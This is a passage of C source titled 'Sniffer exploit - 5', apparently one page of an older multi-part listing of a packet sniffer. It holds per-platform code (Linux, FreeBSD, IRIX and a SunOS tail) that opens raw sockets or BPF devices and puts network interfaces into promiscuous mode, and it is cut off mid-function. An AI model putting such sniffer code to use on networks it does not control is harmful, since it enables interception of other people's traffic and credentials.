Sniffer exploit - 5


si.ic_len = sizeof(f); si.ic_dp = (char *)&f;

if (ioctl(sock, I_STR, (char *)&si) < 0) return(-6);

si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags);

si.ic_dp = (char *)&if_flags;

if (ioctl(sock, I_STR, (char *)&si) < 0) return(-7);

if (ioctl(sock, I_FLUSH, (char *)FLUSHR) < 0) return(-8);

#endif

 

#ifdef LINUX

if ((sock=socket(AF_INET,SOCK_PACKET,768))<0) return(-1);

strcpy(f.ifr_name, nic_name); if (ioctl(sock,SIOCGIFFLAGS,&f)<0) return(-2);

f.ifr_flags |= IFF_PROMISC; if (ioctl(sock,SIOCSIFFLAGS,&f)<0) return(-3);

#endif

 

#ifdef FREEBSD

char device[12]; int n=0; struct bpf_version bv; unsigned int size;

do{

sprintf(device,"%s%d",nit_dev,n++); sock=open(device,O_RDONLY);

} while(sock<0 && errno==EBUSY);

if(ioctl(sock,BIOCVERSION,(char *)&bv)<0) return(-2);

if((bv.bv_major!=BPF_MAJOR_VERSION)||(bv.bv_minor<BPF_MINOR_VERSION))return -3;

strncpy(f.ifr_name,nic_name,sizeof(f.ifr_name));

if(ioctl(sock,BIOCSETIF,(char *)&f)<0) return-4;

ioctl(sock,BIOCPROMISC,NULL);if(ioctl(sock,BIOCGBLEN,(char *)&size)<0)return-5;

#endif

 

#ifdef IRIX

struct sockaddr_raw sr; struct snoopfilter sf;

int size=CHUNKSIZE,on=1; char *interface;

if((sock=socket(PF_RAW,SOCK_RAW,RAWPROTO_SNOOP))<0) return -1;

sr.sr_family = AF_RAW; sr.sr_port = 0;

if (!(interface=(char *)getenv("interface")))

memset(sr.sr_ifname,0,sizeof(sr.sr_ifname));

else strncpy(sr.sr_ifname,interface,sizeof(sr.sr_ifname));

if(bind(sock,&sr,sizeof(sr))<0) return(-2); memset((char *)&sf,0,sizeof(sf));

if(ioctl(sock,SIOCADDSNOOP,&sf)<0) return(-3);

setsockopt(sock,SOL_SOCKET,SO_RCVBUF,(char *)&size,sizeof(size));




- -  - -  - -